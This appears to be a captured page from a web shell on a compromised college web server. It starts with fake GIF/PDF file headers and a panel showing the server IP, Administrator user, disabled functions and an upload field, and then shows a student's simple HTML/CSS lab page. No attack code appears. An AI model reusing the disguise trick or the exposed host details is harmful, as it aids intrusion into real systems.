GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/Classes/CST1021/Labs/Lab05/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Lab 5 B - Jim Martinson</title> <link rel="stylesheet" href="Lab05.css"> <style> p.secondclass { background-color:black; color:orange; } em { color:red; } </style> </head> <body> <h1>Lab 5 B - Jim Martinson</h1> <p> This text is in my simple <p> paragraph with no class or id. </p> <p class="firstclass"> This text is in my <p> paragraph with class "firstclass". </p> <p class="secondclass"> This text is in my <p> paragraph with class "secondclass". Note that the text color is not green as specified by Lab05.css but orange as specified by my internal styles. </p> <p class="secondclass" style="color:yellow;"> This text is in my second <p> paragraph with class "secondclass". Note that the text color is not orange as specified by the internal but yellow as specified by my inline style. </p> <p class="normal"> This text is in my <p> paragraph with class "normal". <em>This is some text in an <em> tag.</em> <strong>This is some text in a <strong> tag.</strong><br> <a href="JimMartinson-Lab05-A.html">Here is my link to JimMartinson-Lab05-A.html</a>.<br> </p> </body> </html>